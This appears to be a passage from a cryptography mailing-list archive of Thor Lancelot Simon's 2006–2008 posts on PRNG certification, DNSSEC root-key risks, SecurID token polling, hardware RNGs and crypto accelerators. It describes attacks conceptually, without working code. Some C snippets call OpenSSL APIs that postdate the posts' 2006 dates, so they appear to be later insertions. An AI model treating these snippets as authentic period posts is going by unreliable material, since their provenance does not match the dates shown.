was secure, they'd probably get all defensive if you said it wasn't, at
least not how they'd configured it.

One could think of it, I suppose, as a combination of drinking the Kool-
Aid and buying the snake oil -- drinking the snake oil?  Whatever one calls
it, one should be very careful of its effects on the popular consciousness
when trying to understand what user preferences for this security product
over that one actually mean.

Thor



Re: Gutmann Soundwave Therapy

2008-02-01 Thread Thor Lancelot Simon
On Thu, Jan 31, 2008 at 04:07:03PM +0100, Guus Sliepen wrote:
 
 Peter sent us his write-up up via private email a few days before he
 posted it to this list (which got it on Slashdot). I had little time to
 think about the issues he mentioned before his write-up became public.
 When it did, I (and others too) felt attacked in a cruel way. Peter
 ignored all the reasons *why* we used the kind of crypto we did at
 that moment, compared it to a very high standard, and made it feel like
 every thing we didn't do or didn't do as well as SSL made our crypto
 worthless. 

There is no valid reason to ship snake oil cryptography (at any moment).

There is no standard but a high standard which is appropriate for
comparison.

Since SSL was already available, there was no excuse to do anything
worse.

It seems that you still don't understand those things, or you would not
complain about them even at this far removed date.  How unfortunate.

Thor



Re: Flaws in OpenSSL FIPS Object Module

2007-12-14 Thread Thor Lancelot Simon
On Tue, Dec 11, 2007 at 04:00:42PM -0500, Leichter, Jerry wrote:
 |  It is, of course, the height of irony that the bug was introduced in
 |  the very process, and for the very purpose, of attaining FIPS
 |  compliance!
 | 
 | But also to be expected, because the feature in question is
 | unnatural: the software needs a testable PRNG to pass the compliance
 | tests, and this means adding code to the PRNG to make it more
 | predictable under test conditions.

 Agreed.  In fact, this fits with an observation I've made in many
 contexts in the past:  Any time you introduce a new mode of operation,
 you are potentially introducing a new failure mode corresponding to
 it as well.

In fact, I was in the middle of a FIPS-140 certification at level 2
a number of years ago when the Known Answer Test for the X9.17 block
cipher based PRNG was introduced.  One unanticipated side effect of
this test was to make it impossible to actually use a clock or free
running counter as the counter in the PRNG, since the KAT expected
the simplistic "increment counter by 1 every time a block is extracted"
behavior chosen by most implementers.

Of course, that mode is _less_ secure (because the internal state is
more predictable) than the other, but given the choice between "validate
PRNG using special mode, run it using normal mode" and "validate PRNG
using special mode, run it using special mode" I know I'd pretty much
always take the latter.  In fact, the test lab we were using told us
they were quite skeptical about the former as well.

Fortunately, the requirement for the PRNG KAT was delayed long enough
to let us get our code out the door without having to actually choose
either of the unpalatable ways.  But it does highlight a certain tension
in the process: they want to know that algorithms have predictable
(correct) results, but RNGs are supposed to have unpredictable (correct)
results.  So any PRNG that is testable as part of the certification
process pretty much _has to_ have two modes, and bugs like this may
be more likely to occur in normal operation.
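
To make the tension concrete, here is a compressed sketch of an
X9.17-style generator step, showing the two modes.  AES is used for
brevity (the construction at issue used DES/3DES); this is illustrative
only, not a certified implementation.  The only difference between the
modes is where the DT input comes from: a bare block counter is
reproducible for the Known Answer Test, a free-running clock is less
predictable but has no fixed Known Answer.

#include <stdint.h>
#include <string.h>
#include <time.h>
#include <openssl/aes.h>

static AES_KEY K;
static unsigned char V[16];   /* secret seed state */
static uint64_t counter;      /* "KAT mode" block counter */

void x917_init(const unsigned char key[16], const unsigned char seed[16])
{
    AES_set_encrypt_key(key, 128, &K);
    memcpy(V, seed, 16);
}

static void xor16(unsigned char *d, const unsigned char *a,
                  const unsigned char *b)
{
    int i;
    for (i = 0; i < 16; i++)
        d[i] = a[i] ^ b[i];
}

void x917_block(unsigned char out[16], int kat_mode)
{
    unsigned char DT[16] = { 0 }, I[16], t[16];

    if (kat_mode) {
        memcpy(DT, &counter, sizeof(counter));  /* predictable by design */
        counter++;
    } else {
        uint64_t now = (uint64_t)time(NULL);    /* free-running clock */
        memcpy(DT, &now, sizeof(now));
    }
    AES_encrypt(DT, I, &K);       /* I = E_K(DT)    */
    xor16(t, I, V);
    AES_encrypt(t, out, &K);      /* R = E_K(I ^ V) */
    xor16(t, out, I);
    AES_encrypt(t, V, &K);        /* V = E_K(R ^ I) */
}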

Thor



Re: debunking snake oil

2007-09-04 Thread Thor Lancelot Simon
On Mon, Sep 03, 2007 at 04:27:22PM -0400, Vin McLellan wrote:
 Thor Lancelot quoted that, and erupted with sanctimonious umbrage:
 
 I think it's important that we know, when flaws in commercial
 cryptographic products are being discussed, what the interests of the
 parties to the discussion are.  So, I'll ask again, as I did last time:
 when you post here, both in this instance and in past instances, is it
 at your own behest, or that of RSA?
 
 This is puerile.  One moderator is not enough? Now you want to set 
 yourself up as the Inquisition to vet for ideological purity?  No one 
 at RSA (or EMC, now RSA's parent firm) even knows about this 
 discussion, you ninny. Who would care?

[And a couple of hundred more lines -- but no actual direct answer to
 the question!]

I'll try again: yes, you've identified yourself as a consultant to RSA.
When you have posted here, both in this most recent thread and in other
threads, in particular the SecurID 800 thread, has it been at your own
behest, or that of RSA?

In other words, when you post here defending RSA products against
criticism, often with very emphatic language and in a way that belittles
the person making the criticism rather than engaging with the actual
technical critique, can we assume that it is not the case that RSA
asked you to do so?  Or is it, in fact, sometimes the case that RSA
asks you to post about their products here, and thus we should read your
words as being RSA's words?

I don't think it's an unreasonable question, and I ask it one more time
because, despite all the vitriol you directed at me (including the rather
odd choice to refer to me by my middle name rather than in a more normal
way) you did not, in fact, answer it.

Thor



Re: debunking snake oil

2007-09-02 Thread Thor Lancelot Simon
On Sun, Sep 02, 2007 at 06:26:33PM -0400, Vin McLellan wrote:
 At 12:40 PM 9/2/2007, Paul Walker wrote:
 
 I didn't realise the current SecurID tokens had been broken. A quick Google
 doesn't show anything, but I'm probably using the wrong terms. Do you have
 references for this that I could have a look at?
 
 I'd also be interested in any evidence that the SecurID has been cracked.
 
 Any credible report would have the immediate attention of tens of 
 thousands of RSA installations. Not to speak of EMC/RSA. itself, for 
 which I have been a consultant for many years.

That's right, you have.  As I recall, the last time you posted here was
when you tried to defend RSA's decision to sell no-human-interaction
tokens.  At that time, I asked you whether you were posting for yourself
or whether someone at RSA had asked you to post here, and you declined
to respond.

I think it's important that we know, when flaws in commercial
cryptographic products are being discussed, what the interests of the
parties to the discussion are.  So, I'll ask again, as I did last time:
when you post here, both in this instance and in past instances, is it
at your own behest, or that of RSA?

Thor



Re: Skype new IT protection measure

2007-08-20 Thread Thor Lancelot Simon
On Mon, Aug 20, 2007 at 11:42:39AM -0400, Peter Thermos wrote:
 
 We can confirm categorically that no malicious activities were attributed
 or that our users' security was not, at any point, at risk.

One wonders if it was their attorneys who suggested that they confirm
categorically that x OR y -- never mind that no malicious activities
being attributed (by whom? to whom? attribute takes a subject and an
object, and neither is optional!  note the passive voice!) doesn't mean,
of course, that none occurred, nor that none were discovered by others
or even by Skype itself.

Reads like classic corporate weasel-wording to me.

Thor



Re: The bank fraud blame game

2007-07-02 Thread Thor Lancelot Simon
On Sun, Jul 01, 2007 at 08:38:12AM -0400, Perry E. Metzger wrote:
 
 [EMAIL PROTECTED] (Peter Gutmann) writes:
  (The usage model is that you do the UI portion on the PC, but
  perform the actual transaction on the external device, which has a
  two-line LCD display for source and destination of transaction,
  amount, and purpose of the transaction.  All communications enter
  and leave the device encrypted, with the PC acting only as a proxy.
  Bill of materials shouldn't be more than about $20).
 
 I've been thinking this was the way to go for years now.

Who hasn't?  Oh, I'm sorry -- I meant to say: who, outside of the
set of producers and consumers of security snake oil aimed at
financial institutions, hasn't?

Regular readers will recall the SecurID discussion of about a
year ago, when an individual who appeared to be a paid consultant
to RSA vigorously put forth the notion that secure devices which
required the user to actually do something to authenticate a
transaction were _not_ what was needed -- to the shock and awe
of most readers of, and writers to, the thread here, at least
as I would summarize the discussion.

Thor



Re: 307 digit number factored

2007-06-09 Thread Thor Lancelot Simon
On Thu, May 24, 2007 at 01:01:03PM -0400, Perry E. Metzger wrote:
 
 Even for https, it costs no more to type in 2048 than 1024 into
 your cert generation app the next time a cert expires. The only
 potential cost is if you're so close to the performance line that
 slower RSA ops will cause you pain -- otherwise, it is pretty much
 costless. For average people's web servers most of the time,
 connections are sufficiently infrequent and RSA operations are fast
 enough that it makes no observable difference.

I don't buy it.  I build HTTP load balancers for a living, and for
basically all of our customers who use our HTTPS acceleration at all,
the cost of 1024-bit RSA is already, by a hefty margin, with hardware
assist, the limiting factor for performance.  Look at the specs on
some of the common accelerator families sometime: 2048-bit is going to
be quite a bit worse.

Busy web sites that rely on HTTPS are going to pay a fairly heavy price
for using longer keys, and not just in cycles: the few hardware solutions
still on the market that can stash keys in secure storage, of course, can
stash exactly half as many 2048-bit keys as 1024-bit ones.  Users who care
about HTTPS performance aren't as rare, I think, as you think.

What's more frustrating is the slow rate at which accelerator vendors
have moved ECC products towards market.  That's not going to help with
adoption any.



Re: DNSSEC to be strangled at birth.

2007-04-06 Thread Thor Lancelot Simon
On Thu, Apr 05, 2007 at 07:32:09AM -0700, Paul Hoffman wrote:
 
 Control: The root signing key only controls the contents of the root, 
 not any level below the root.

That is, of course, false, and presumably is _exactly_ why DHS wants
the root signing key: because, with it, one can sign the appropriate
chain of keys to forge records for any zone one likes.

Plus, now that applications are keeping public keys for services in
the DNS, one can, in fact, forge those entries and thus conduct man in
the middle surveillance on anyone dumb enough to use DNS alone as a
trust conveyor for those protocols (e.g. SSH and quite possibly soon
HTTPS).

I know you understand this stuff well enough to know these risks exist.
I'm curious why you'd minimize them.

Thor



Re: DNSSEC to be strangled at birth.

2007-04-06 Thread Thor Lancelot Simon
On Thu, Apr 05, 2007 at 04:49:33PM -0700, Paul Hoffman wrote:
 
 because, with it, one can sign the appropriate
 chain of keys to forge records for any zone one likes.
 
 If the owner of any key signs below their level, it is immediately 
 visible to anyone doing active checking. The root signing furble.net 
 instead of .net signing furble.net is a complete giveaway to a 
 violation of the hierarchy and an invitation for everyone to call 
 bullshit on the signer. Doing so would completely negate the value of 
 owning the root-signing key.

You're missing the point.  The root just signs itself a new .net key,
and then uses that to sign a new furble.net key, and so forth.  No
unusual key use is required.

It's a hierarchy of trust: if you have the top, you have it all, and
you can forge anything you like, including the keys used to sign the
application key records used to encrypt user data, where they are
present in the system.

Thor



Re: DNSSEC to be strangled at birth.

2007-04-06 Thread Thor Lancelot Simon
On Thu, Apr 05, 2007 at 05:30:53PM -0700, Paul Hoffman wrote:
 At 7:54 PM -0400 4/5/07, Thor Lancelot Simon wrote:
 
 You're missing the point.  The root just signs itself a new .net key,
 and then uses that to sign a new furble.net key, and so forth.  No
 unusual key use is required.
 
 And you seem to be missing my point. If the root signs itself a new 
 .net key, it will be completely visible to the entire community using 
 DNSSEC. The benefit of doing so in order to forge the key for 
 furble.net (or microsoft.com) will be short-lived, as will the 
 benefit of owning the root key.

You assume the new .net key (and what's signed with it) would be
supplied to all users of the DNS, rather than used for a targeted
attack on one user (or a small number of users).  Why assume the
potential adversary will restrict himself to the dumbest possible
way to use the new tools you're about to hand him?

Do you really think that the administrator of the _average_ DNS
client would notice that a new key for .net showed up?  It's trivial
to inject forged UDP packets, after all, so it is hardly the case
that one has to give the new forged key chain to every DNS server 
along the way in order to run a nasty MITM attack on a client.

Thor



Re: OT: SSL certificate chain problems

2007-01-30 Thread Thor Lancelot Simon
On Fri, Jan 26, 2007 at 11:42:58AM -0500, Victor Duchovni wrote:
 On Fri, Jan 26, 2007 at 07:06:00PM +1300, Peter Gutmann wrote:
 
  In some cases it may be useful to send the entire chain, one such being 
  when a
  CA re-issues its root with a new expiry date, as Verisign did when its roots
  expired in December 1999.  The old root can be used to verify the new root.
 
 Wouldn't the old root also (until it actually expires) verify any
 certificates signed by the new root? If so, why does a server need to
 send the new root? So long as the recipient has either the new or the
 old root, the chain will be valid.

That doesn't make sense to me -- the end-of-chain (server or client)
certificate won't be signed by _both_ the old and new root, I wouldn't
think (does X.509 even make this possible)?

That means that for a party trying to validate a certificate signed by
the new root, but who has only the old root, the new root's certificate
will be a necessary intermediate step in the chain to the old root, which
that party trusts (assuming the new root is signed by the old root, that
is).

Or do I misunderstand?

Thor



Re: How important is FIPS 140-2 Level 1 cert?

2006-12-27 Thread Thor Lancelot Simon
On Tue, Dec 26, 2006 at 05:36:42PM +1300, Peter Gutmann wrote:
 
 In addition I've heard of evaluations where the generator is required to use a
 monotonically increasing counter (clock value) as the seed, so you can't just
 use the PRNG as a postprocessor for an entropy polling mechanism.  Then again
 I know of some that have used it as exactly that without any problems.

This (braindamaged) requirements change was brought in by the creation of
a Known Answer Test for the cipher-based RNG.  Prior to the addition of
that test, one could add additional entropy by changing the seed value at
each iteration of the generator.  But that makes it, of course, impossible
to get Known Answers that confirm that the generator actually implements
the standard.  So suddenly the alternate form of the generator -- in my
opinion much less secure -- which uses a monotonically-increasing counter
for the seed, was the only permitted form.

I have yet to hear of anyone who has found a test lab that will certify
a generator implementation that uses the mono counter for the KAT suite
but a random seed in normal operation.  For good reason, labs are usually
very leery of algorithm implementations that come with a special test
mode.

However, you are free to change the actual key for the generator as often
as you like.  I'm not sure why OpenSSL doesn't implement fork protection
that way, for example -- or does it use the MAC-based generator instead?

Thor



Re: cellphones as room bugs

2006-12-03 Thread Thor Lancelot Simon
On Sat, Dec 02, 2006 at 05:15:02PM -0500, John Ioannidis wrote:
 On Sat, Dec 02, 2006 at 10:21:57AM -0500, Perry E. Metzger wrote:
  
  Quoting:
  
 The FBI appears to have begun using a novel form of electronic
 surveillance in criminal investigations: remotely activating a
 mobile phone's microphone and using it to eavesdrop on nearby
 conversations.
 
 Not very novel; ISDN phones, all sorts of digital-PBX phones, and now
 VoIP phones, have this feature (in the sense that, since there is no
 physical on-hook switch (except for the phones in Sandia and other
 such places), it's the PBX that controls whether the mike goes on or
 not).

It's been a while since I built ISDN equipment but I do not think this
is correct: can you show me how, exactly, one uses Q.931 to instruct the
other endpoint to go off-hook?



Re: TPM disk crypto

2006-10-08 Thread Thor Lancelot Simon
On Thu, Oct 05, 2006 at 11:51:49PM +0200, Erik Tews wrote:
 Am Donnerstag, den 05.10.2006, 16:25 -0500 schrieb Travis H.:
  On 10/2/06, Erik Tews [EMAIL PROTECTED] wrote:
   Am Sonntag, den 01.10.2006, 23:42 -0500 schrieb Travis H.:
Anyone have any information on how to develop TPM software?
http://tpm4java.datenzone.de/
   Using this lib, you need less than 10 lines of java-code for doing some
   simple tpm operations.
  
  Interesting, but not what I meant.  I want to program the chip to verify
  that the BIOS, boot sector, root partition conform to *my* specification.
  
 You can do that (at least in theory).
 
 First, you need a system with tpm. I assume you are running linux. Then
 you boot your linux-kernel and an initrd using the trusted grub
 bootloader. Your bios will report the checksum of trusted grub to the
 tpm before giving control to your grub bootloader.

And the TPM knows that your BIOS has not lied about the checksum of grub
how?

Thor



Re: RSA SecurID SID800 Token vulnerable by design

2006-09-14 Thread Thor Lancelot Simon
On Wed, Sep 13, 2006 at 10:23:53PM -0400, Vin McLellan wrote:
 
[... a long message including much of what I can only regard as
 outright advertising for RSA, irrelevant to the actual technical
 weakness in the SID800 USB token that Hadmut described, and which
 Vin's message purportedly disputes.  It would be nice if, when confronted
 with such a response in the future, the moderator of this list would
 return it to its author with the requirement that the marketeering be
 stripped out before the actual content be forwarded to this list!  I
 have snipped everything irrelevant to my own response. ... ]

 None of these features -- none of the SID800's cryptographic 
 resources -- were of apparent interest to Mr. Danisch. He ignored 
 them all when he denounced the SID800 as vulnerable by design.

As well he should have, because they are utterly irrelevant to the
genuine design flaw which he pointed out, and which Vin seeks to
minimize (by burying it in irelevancies?) here.

 What particularly disturbs Mr. D is one option among the SID800 
 SecurID features which allows RSA's local client software to poll and 
 retrieve a single OTP from the token when the SID800 is plugged into 
 the PC's USB port.  Given the potential for malicious malware to 
 invade and take control of any Windows PC -- malware that can seize 
 and misuse both the user's PIN and an OTP fresh from the USB bus -- 
 it was irresponsible, Danisch suggests, for RSA to make such a option 
 available to its customers.

And so it was.  Vin simply handwaves away the fact that if RSA's client
software can poll the token and retrieve the current OTP, so can any
malicious software running on the host to which the token is attached.

It is not correct to suggest that perhaps this could be done only once,
when the token was first plugged in to the host system's USB port,
because USB *by design* allows the host to cut and restore power to
devices under software control.  Even if the SID800 is somehow intended
to allow token retrieval only once, upon plug-in (something Vin seems
to imply, but does not directly state), it can simply be tricked,
repeatedly, into thinking that it has just been plugged in.

 In the second version of the SID800 -- an option selectable by local 
 management pre-purchase, and burnt into the token's USB firmware by 
 RSA -- the user can select a menu in which he instructs the SecurID 
 to load one OTP token-code directly into the paste buffer, presumably 
 for immediate use. Since internal access to the SecurID's OTP via the 
 USB bus makes it a potential target for malware or intruders on the 
 computer, claimed Mr. Danisch, This is weak by design.  I beg to 
 differ. Effective IT security is about an appropriate balance, not 
 walls of iron or stone.

Good cooking is about full-bodied flavor, not wire rope or Persian
kittens; but let's leave the irrelevant analogy aside and stick to the
facts that seem to be discussed here, I suppose.

Vin claims that the user "instructs the SecurID to load one OTP
token-code directly into the paste buffer".  This is a very, very odd
claim, because it implies that the user communicates directly with a
USB peripheral and instructs _the peripheral_ to autonomously load
a token-code -- some bytes -- into an area in host memory that is used
by the host operating system's user interface.  We should note that,
unlike Firewire, USB *does not include a mechanism by which a
peripheral on the bus may initiate a DMA transfer into the memory of
the host system that is the master of the bus* so clearly what Vin
claims cannot be strictly true.  What, then, should we think that it
likely means?  I think he must mean something like this:

  "The user instructs the RSA-supplied application code running on the
   host system to retrieve one token code from the SecurID across the
   USB bus, and place that retrieved token code into the paste buffer."

If that is not what Vin means, I think that he should respond and say
exactly what he does mean, in a way that does not make reference to
mythical properties that USB peripherals do not have.

Now, consider what it means that it is even _possible_ for the RSA-
supplied application to retrieve a token code from the SID800 in this
way.  It means that by, at worst, cutting and restoring power to the
USB port in question, malicious software can retrieve *a new, current
token code* *any time it wants to do so*.  In other words, while, with
traditional SecurID tokens, it is possible for malicious software to
steal token codes typed by the user into a compromised host system _when
the user types them_, and by engaging in a man-in-the-middle scheme
impersonate the intended target system to the user _that once_ (since
SecurID token codes can not be used twice), this new system does, in
fact, open up the gaping new security hole Danisch claims it does:

   With this USB-connected token, malicious software on the host can poll
   the token and retrieve a new, current token code any time it wants to.

Re: Exponent 3 damage spreads...

2006-09-13 Thread Thor Lancelot Simon
On Mon, Sep 11, 2006 at 06:18:06AM +1000, James A. Donald wrote:
 
 3.  No one actually uses DNSSEC in the wild.

DNSSEC seems to be not-uncommonly used to secure dynamic updates,
which is not the most common DNS feature in the world but it is not
so uncommon either.


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: SSL Cert Prices Notes

2006-08-10 Thread Thor Lancelot Simon
On Mon, Aug 07, 2006 at 05:12:45PM -0700, John Gilmore wrote:
 
  The good news is that CAcert seems to be positioned for prime time debut, 
 and you can't beat *Free*. :-)

You certainly can, if slipshod practices end up _costing_
you money.

Has CAcert stopped writing certificates with no DN yet?

Has CAcert stopped writing essentially unverifiable (or,
if you prefer to think of it that way, forensics-hostile)
CN-only certificates on the basis of a single email exchange
yet?

Has CAcert stopped using MD5 in all their signatures yet?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Crypto to defend chip IP: snake oil or good idea?

2006-07-29 Thread Thor Lancelot Simon
On Thu, Jul 27, 2006 at 08:53:26PM -0600, Anne & Lynn Wheeler wrote:
 
 If you treat it as a real security chip (the kind that goes into 
 smartcards and hardware token) ... it eliminates the significant 
 post-fab security handling (prior to finished delivery), in part to 
 assure that counterfeit / copy chips haven't been introduced into the 
 stream  with no increase in vulnerability and threat.

I don't get it.  How is there no increase in vulnerability and threat
if a manufacturer of counterfeit / copy chips can simply read the already
generated private key out of a legitimate chip (because it's not protected
by a tamperproof module, and the significant post-fab security handling
has been eliminated) and make as many chips with that private key as he
may care to?

Why should I believe it's any harder to steal the private key than to
steal a static serial number?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Crypto to defend chip IP: snake oil or good idea?

2006-07-29 Thread Thor Lancelot Simon
On Fri, Jul 28, 2006 at 03:52:55PM -0600, Anne & Lynn Wheeler wrote:
 Thor Lancelot Simon wrote:
 I don't get it.  How is there no increase in vulnerability and threat
 if a manufacturer of counterfeit / copy chips can simply read the already
 generated private key out of a legitimate chip (because it's not protected
 by a tamperproof module, and the significant post-fab security handling
 has been eliminated) and make as many chips with that private key as he
 may care to?
 
 Why should I believe it's any harder to steal the private key than to
 steal a static serial number?
 
 so for more drift ... given another example of issues with static
 data authentication operations is that static serial numbers aren't 
 normally considered particularly secret ... and partially as a result 
 ... they tend to have a fairly regular pattern ... frequently even 
 sequential. there is high probability that having captured a single 
 static serial number ... you could possibly correctly guess another 
 million or so static serial numbers w/o a lot of additional effort. This 
 enables the possibly trivial initial effort to capture the first serial 
 number to be further amortized over an additional million static serial 
 numbers ... in effect, in the same effort it has taken to steal a single 
 static serial number ... a million static serial numbers have 
 effectively been stolen.

The simple, cost-effective solution, then, would seem to be to generate
static serial numbers like cipher keys -- with sufficient randomness
and length that their sequence cannot be predicted.  I still do not see
the advantage (except to Certicom, who would doubtless like to charge a
bunch of money for their 20-40k gate crypto code) of using asymmetric
cryptography in this application.
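
For illustration, something as simple as this -- reading /dev/urandom,
though any decent entropy source would do -- gives you serial numbers
with exactly that property:

#include <stdio.h>

/* Generate a 128-bit serial number that cannot be predicted from any
 * other serial number.  Returns 0 on success, -1 on failure. */
int random_serial(unsigned char buf[16])
{
    FILE *f = fopen("/dev/urandom", "rb");
    int ok = -1;

    if (f != NULL) {
        if (fread(buf, 1, 16, f) == 16)
            ok = 0;
        fclose(f);
    }
    return ok;
}

At 128 bits, capturing one serial number tells the attacker nothing
about any of the others -- the property the sequential schemes lack --
and it costs rather less than 20-40k gates of asymmetric crypto.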


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Crypto to defend chip IP: snake oil or good idea?

2006-07-27 Thread Thor Lancelot Simon
On Tue, Jul 25, 2006 at 03:49:11PM -0600, Anne & Lynn Wheeler wrote:
 Perry E. Metzger wrote:
 EE Times is carrying the following story:
 
 http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=190900759
 
 It is about attempts to use cryptography to protect chip designs from
 untrustworthy fabrication facilities, including a technology from
 Certicom.
 

 http://www.garlic.com/~lynn/x959.html#aads
 
 which basically puts keygen and minimal number of other circuits in the 
 chip. keygen is executed as part of standard initial power-on/test ... 
 before the chips are sliced and diced from the wafer.

So, you sign the public key the chip generated, and inject the _signed_
key back into the chip, then package and ship it.  This is how the SDK
for IBM's crypto processors determines that it is talking to the genuine
IBM product.  It is a good idea, and it also leaves the chip set up for
you with a preloaded master secret (its private key) for encrypting other
keys for reuse in insecure environments, which is really handy.
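
For what it's worth, the factory-side signing step is nothing exotic --
just an ordinary signature over the public-key bits the chip emitted.
A rough sketch with OpenSSL's EVP interface (the key file name and the
raw-blob framing are my assumptions, and error reporting is minimal):

#include <stdio.h>
#include <openssl/evp.h>
#include <openssl/pem.h>

/* Sign the chip's public-key blob with the factory's RSA key, so the
 * chip can later prove it came off this line.  Returns 0 on success. */
int sign_chip_pubkey(const unsigned char *blob, size_t bloblen,
                     unsigned char *sig, size_t *siglen)
{
    FILE *f = fopen("factory-key.pem", "r");    /* assumed key file */
    EVP_PKEY *key;
    EVP_MD_CTX *md;
    int ok = -1;

    if (f == NULL)
        return -1;
    key = PEM_read_PrivateKey(f, NULL, NULL, NULL);
    fclose(f);
    if (key == NULL)
        return -1;
    md = EVP_MD_CTX_new();
    if (EVP_DigestSignInit(md, NULL, EVP_sha256(), NULL, key) == 1 &&
        EVP_DigestSign(md, sig, siglen, blob, bloblen) == 1)
        ok = 0;
    EVP_MD_CTX_free(md);
    EVP_PKEY_free(key);
    return ok;
}

The signature (and nothing secret) then gets written back into the
part; verification needs only the factory's public key.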

But do we really think that general-purpose CPUs or DSPs are going to
be packaged in the kind of enclosure IBM uses to protect the private keys
inside its cryptographic modules?

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: Use of TPM chip for RNG?

2006-07-04 Thread Thor Lancelot Simon
On Mon, Jul 03, 2006 at 10:41:05AM -0600, Anne & Lynn Wheeler wrote:
 
 however, at least some of the TPM chips have RNGs that have some level 
 of certification (although you might have to do some investigation to 
 find out what specific chip is being used for TPM).

See one of the examples in my other message today in this thread (subject
changed as an aid to new readers) for an example of why you should *not*
trust such certifications as evidence that the RNG is any good.

Summary: I have encountered one such RNG that was FIPS-140 certified as
a Deterministic RNG but whose hardware inputs the vendor refused to
disclose, which I find extremely suspicious.  It is possible to get a
DRNG certified without careful analysis of what its input is; I have
personally seen this happen and heard of more instances even after NIST
gave specific guidance to the contrary.

-- 
  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Dirty Secrets of noise based RNGs

2006-07-04 Thread Thor Lancelot Simon
On Mon, Jul 03, 2006 at 02:31:10PM +1200, Peter Gutmann wrote:
 
 So the only hardware RNG I'd trust is one of the noise-based ones on full-
 scale crypto processors like the Broadcom or HiFn devices, or the Via x86's.
 There are some smart-card vendors who've tried to replicate this type of
 generator in a card form-factor device, but from what little technical info is
 available about generators on smart cards it seems to be mostly smoke and
 mirrors.

Do you actually know of publically available documentation on the design
and implementation of *any* of these noise based RNGs?  I have spent
some time looking, and I do not.

Here is what I do know:

1) There's one exception: Hifn documents the RNG used on their 65xx and
   can, upon request, provide documentation on exactly how the version
   on the common 79xx chips differs from this design.  They also provide
   a fairly good analysis (practical and theoretical) of the design's
   strength.

BUT

2) Hifn used to make this documentation publically available but access
   to it now requires permission from Hifn sales -- it has been password
   protected on their public web site.  In other words, after years of
   design wins based on little but open-source friendliness (after all,
   Hifn's chips are no faster, often slower, than others', and notoriously
   buggy) they are now, at least on this issue, biting the hand that feeds
   them.

3) Broadcom makes no RNG documentation, much less analysis, publically
   available.  If you're using their RNG without NDA documentation that
   may or may not even exist, it's on a "trust us...really!" basis.

4) Neither does any other crypto vendor for whose products open-source
   drivers are available, AFAICT.

5) Some general-purpose CPU and motherboard chipset vendors include RNGs
   in their product.  Intel used to do so, and had a very good analysis
   of their product available.  But then they muddied the water by making
   it impossible to tell which chips had real RNGs on them and which just
   had junk registers sampling who knows what -- probably bus noise in
   some cases.  And they now call the RNG product "end of life".

   AMD has an RNG on their host chipset for Opteron, as they did on their
   last server chipset for Athlon MP.  But they do not document how it
   works nor provide any analysis of its strength.

   I have not had time to investigate the situation vis-a-vis VIA.  I am
   told it's somewhat better, but I was told the Broadcom stuff was
   trustworthy, too, and then I found out that the person who said so did
   not really have documentation either!

6) I have run into one implementation of an RNG on a crypto processor
   from a major vendor that is actually clearly, once one reads between
   the lines of its documentation, an X9.31 Deterministic RNG using the
   symmetric crypto functionality of the chip.  The vendor's documentation
   is silent as to what the actual entropy source is, and they *did not
   respond to a direct inquiry* on the subject.  This product is FIPS-140
   certified; but it was clearly designed *only* to pass certification,
   and for obvious reasons, you should not trust it!

   A good FIPS-140 test lab should follow the guidance from NIST that the
   input source to the D. RNG must not contain less entropy than the
   output.  But it is possible to sneak almost anything past a test lab
   if you're crafty about it, and this vendor's refusal to disclose to a
   high-volume customer where the input bits come from is really scary.

All of this adds up to: vendors are doing things with their "noise-based"
RNGs that should *really* scare you.  If you are specifying such a RNG
for deployment, and you have any leverage over the vendor who makes it,
I strongly urge you to make disclosure of how it works, including any
analysis they've done, a condition of your use of their product.  The
Intel and Hifn white papers are good examples of what *every* vendor
should be willing to publically disclose, if their RNG design does not
give them something to hide.

-- 
  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
   aim, untroubled by the need to compromise with others.  - H.L.A. Hart

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Crypto hardware with secure key storage

2006-05-19 Thread Thor Lancelot Simon
I'm trying to investigate which of the current high-end PCI crypto
accelerators include secure storage of key material -- that is, the
use model where one loads, say, an RSA private key or a key for a symmetric
cipher into the device once, receives a reference, and can later, even
after device power-down, tell the card "use key with reference X for this
operation".

I realize that there are ways to do this without actual persistent storage
on the card, e.g. encryption of the key with a symmetric cipher using a
secret key stored in the card, which allows the cleartext key to be disposed
of so long as the card can be told "okay, decrypt and use this key in the
future".  That's fine, too.
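
The wrap-a-key-and-return-a-blob scheme is the sort of thing RFC 3394
AES key wrap was designed for.  A sketch of the host-visible half with
OpenSSL (note the explicit opt-in flag the wrap modes require; the
function name and framing are mine):

#include <openssl/evp.h>

/* Wrap 'key' (keylen a multiple of 8, at least 16) under the card's
 * internal KEK.  'out' needs room for keylen + 8 bytes.  Returns the
 * wrapped length, or -1 on error. */
int wrap_key(const unsigned char kek[32],
             const unsigned char *key, int keylen, unsigned char *out)
{
    EVP_CIPHER_CTX *c = EVP_CIPHER_CTX_new();
    int n = 0, m = 0, ok;

    EVP_CIPHER_CTX_set_flags(c, EVP_CIPHER_CTX_FLAG_WRAP_ALLOW);
    ok = EVP_EncryptInit_ex(c, EVP_aes_256_wrap(), NULL, kek, NULL) == 1 &&
         EVP_EncryptUpdate(c, out, &n, key, keylen) == 1 &&
         EVP_EncryptFinal_ex(c, out + n, &m) == 1;
    EVP_CIPHER_CTX_free(c);
    return ok ? n + m : -1;
}

The host stores the opaque blob and hands it back later; the cleartext
key need never leave the device.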

I've run into some vendors who claim to support "secure key storage"
but turn out to mean something else by it.  I'm specifically looking
for a device that accelerates pubkey operations and is aimed at SSL.

If people with experience with particular hardware want to share that
with me in private rather than broadcasting it to the list, that's fine,
too; I'm just trying to select a device to meet an immediate need and
am okay with not shouting out a comparison of vendor capabilites to the
entire world (though I do think it is regrettable that there's a lack
of information on this kind of device capability anywhere public).

-- 
  Thor Lancelot Simon[EMAIL PROTECTED]

  We cannot usually in social life pursue a single value or a single moral
